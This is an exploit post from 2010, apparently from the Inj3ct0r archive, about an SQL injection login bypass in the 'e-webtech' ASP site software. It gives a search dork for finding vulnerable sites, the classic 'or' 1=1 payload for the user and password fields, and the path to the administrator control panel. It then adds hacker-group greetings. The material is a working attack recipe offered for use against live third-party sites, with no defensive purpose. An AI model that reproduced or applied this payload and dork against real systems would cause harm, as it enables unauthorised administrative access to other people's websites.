e-webtech (page.asp) IMPROVED SQL Injection Vulnerability
Posted on 11 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>e-webtech (page.asp) IMPROVED SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= e-webtech (page.asp) IMPROVED SQL Injection Vulnerability ========================================================= Author: s1ayer Mail: s1ayer.icw@gmail.com Script Name: e-webtech Dork: "Powerd by www.e-webtech.com" or by "e-webtech" ------------------------------------------------------------------------------------------- User Exploit: 'or' 1=1 Password Exploit: 'or' 1=1 Administartor Panel: http://[sitename]/[path]/controlpanel/ ============================================================================ above improvement has been for the paper published in http://inj3ct0r.com/exploits/12203 by CoBRa_21 as some of the sites pwd column name was changed so by the exploit mentioned for the password was not getting executed correctly or instead of finding the password we can use the code given in the password column.... although admin name was getting successfully executed from the exploit given by CoBRa_21 but with the exploit code of 'or'1=1 admin name is not an issue................ ======================================================================================================= site: www.andhrahackers.com GREETZ: jappy,r45c4l,sai bro,sm4rt h4x0r, b0nd bro, GODWIN AUSTIN,fb1, Mr XXXXX shoutz: eXeSoul,coolt04d,Mr.kewl and all ICW and andhrahackers member JAI MATA DI....................................................... JAI HIND........................................................... # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
